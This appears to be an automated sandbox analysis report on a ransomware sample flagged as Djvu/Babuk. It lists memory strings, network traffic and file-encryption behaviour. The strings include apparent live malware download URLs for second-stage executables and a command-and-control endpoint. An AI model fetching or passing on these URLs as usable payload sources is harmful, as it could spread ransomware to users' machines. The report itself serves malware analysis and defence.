              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1885940591.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886331763.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886492156.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: unknownDNS traffic detected: queries for: api.2ip.ua
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exe
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2325285876.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exe$run
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exerun
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1885790444.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886016416.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886096086.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886173018.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeString found in binary or memory: http://www.openssl.org/support/faq.html
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886250459.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886331763.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886413450.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886492156.0000000003780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2325285876.00000000032C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$run
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runW=
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exerun
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true(
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637fo
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.phpep
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/0
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000003.1864586284.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/2
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000004.00000002.1800715864.0000000000757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/Root
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeString found in binary or memory: https://api.2ip.ua/geo.json
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json(h
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json2PR
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json=
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonM
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonMb
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonU
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000004.00000002.1800715864.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonWTh
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsoneb
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000004.00000002.1800715864.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonjnu
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonn
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000003.1864586284.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonoX
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000004.00000002.1800715864.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonp=n.
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonrQ
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonsMhmO(
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000003.1864586284.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonu
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonxhZO1
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000004.00000002.1800715864.0000000000757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/k
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/v
              Source: 30264859306.ttf.2.dr, 37262344671.ttf.2.drString found in binary or memory: https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315011643.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2325329106.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315771340.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-OQnsJqCO
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315011643.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2325329106.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315771340.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-OQnsJqCOOl
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315011643.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886601267.0000000003780000.00000004.00001000.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F922E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,0_2_00F922E0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crlJump to dropped file

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Yara detected Babuk Ransomware
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6956, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5776, type: MEMORYSTR
              Yara detected Djvu Ransomware
              Source: Yara matchFile source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: SAMPLE
              Source: Yara matchFile source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1638345295.0000000003681000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.1771858243.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.1641361042.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.1853102324.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1865795422.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1624016801.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1800981688.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6828, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6956, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5776, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5104, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: DROPPED
              Modifies existing user documents (likely ransomware behavior)
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile moved: C:\Users\user\Desktop\ONBQCLYSPU.pngJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile deleted: C:\Users\user\Desktop\ONBQCLYSPU.pngJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile moved: C:\Users\user\Desktop\NWTVCDUMOB.mp3Jump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile deleted: C:\Users\user\Desktop\NWTVCDUMOB.mp3Jump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile moved: C:\Users\user\Desktop\KATAXZVCPS.jpgJump to behavior
              Writes a notice file (html or txt) to demand a ransom
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
              Writes many files with high entropy
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99424089236Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.9984808907Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99543515092Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99552721526Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99285644308Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99741583585Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99638531896Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99113190564Jump to dropped file
